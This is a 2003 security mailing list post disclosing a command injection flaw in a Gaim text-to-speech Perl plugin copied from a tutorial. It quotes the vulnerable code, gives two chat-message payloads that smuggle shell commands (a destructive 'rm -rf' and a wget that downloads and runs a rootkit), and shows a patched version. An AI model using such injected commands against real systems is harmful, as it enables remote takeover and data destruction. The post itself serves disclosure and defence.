[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <1066231795.759.179.camel@localhost>
Date: 15 Oct 2003 17:29:55 +0200
From: error <error@...tinthenoise.net>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com
Subject: Gaim festival plugin exploit
It has come to my attention that people have actually used this example
code for a gaim plugin:
AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");
sub goodbye {
AIM::print("Module Unloaded", "Unloaded Festival TTS");
}
sub synthesize {
my $string = $_[0];
$string =~ s/\<.*?\>//g;
$string =~ s/\".*\"//;
system("echo \"$string\" | /usr/bin/festival --tts");
}
As taken from:
http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl
This has to be one of the most amusing ways to gain a local users
privileges I have ever seen by an "Expert (TM)"
Exploit code?
You have a shell through gaim with that.
Just pass it this message (or really any message for that matter):
Hey, I just wanted to exploit your box, do you mind?"; rm -rf;
Or perhaps:
Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x
rootkit;./rootkit
Perhaps someone should ask:
"(Is s/[^\w]//g really that hard to do?!)"
So a fixed version would look like this:
AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");
sub goodbye {
AIM::print("Module Unloaded", "Unloaded Festival TTS");
}
sub synthesize {
my $string = $_[0];
$string =~ s/\<.*?\>//g;
$string =~ s/\".*\"//;
$string =~ s/[^\w]//g;
system("echo \"$string\" | /usr/bin/festival --tts");
}
Just a minor comment, nothing special.
--
error <error@...tinthenoise.net>
Download attachment "signature.asc" of type "application/pgp-signature" (156 bytes)
Powered by blists - more mailing lists